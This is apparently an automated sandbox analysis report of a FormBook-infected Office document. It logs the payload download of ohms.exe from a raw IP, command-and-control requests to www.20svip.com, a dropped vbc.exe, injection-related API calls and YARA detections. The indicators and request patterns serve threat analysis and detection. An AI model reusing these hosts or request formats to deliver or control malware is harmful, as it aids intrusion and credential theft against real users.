          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.23.213.57 198.23.213.57
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong
          Source: global trafficHTTP traffic detected: GET /ohms.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.57Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.57
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DAC28400.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /ohms.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.57Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1Host: www.20svip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.20svip.com
          Source: powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, 00000004.00000002.2161399460.000000000AE80000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2151765266.0000000002430000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2152599729.00000000021B0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2153930847.0000000002521000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: vbc.exeString found in binary or memory: http://vbcity.com/forums/t/51894.aspx
          Source: powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: vbc.exe, 00000004.00000002.2161399460.000000000AE80000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2151765266.0000000002430000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2152599729.00000000021B0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: powershell.exe, 00000005.00000002.2154252217.0000000002DF7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: powershell.exe, 00000005.00000002.2153372717.0000000002C10000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: powershell.exe, 00000005.00000003.2138542609.000000000063B000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2140413663.00000000002D8000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: powershell.exe, 00000005.00000003.2138542609.000000000063B000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2140413663.00000000002D8000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: powershell.exe, 00000007.00000002.2155583236.0000000002BC0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: vbc.exeString found in binary or memory: https://github.com/MrCylops
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ohms[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_005CB2EE NtQuerySystemInformation,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_005CB2CC NtQuerySystemInformation,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0211B2EE NtQuerySystemInformation,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0211B2CC NtQuerySystemInformation,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_020DB2EE NtQuerySystemInformation,
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_020DB2CC NtQuerySystemInformation,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_0041A060 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00419F30 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00419FE0 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C700C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C70048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C70078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C710D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C70060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C701D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C71148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C7010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C707AC NtCreateMutant,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C71930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C70C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C71D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C6FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FB00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FB07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FB01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FB1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FB010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FB10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FB0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FB0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FB0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FB1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FB1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FB0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FAFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000DA060 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000DA110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000D9F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000D9FE0 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E51C0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E7298
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E62F0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EE578
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E5930
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E0DF8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E80F8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E80E8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E5118
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E718A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E92F0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E92E0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EA43F
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E9510
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E9500
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E45F2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E97D8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E97C8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EE802
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E9991
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EEA60
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E5DA0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E8F58
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003230D0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00322CC0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00324532
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0032416F
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00323720
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00324813
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00324802
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003230BF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00320950
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00323AC8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00323710
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00324779
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00324768
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003247B4
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003247A8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_029E1BE2
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 13_2_0041E1A2
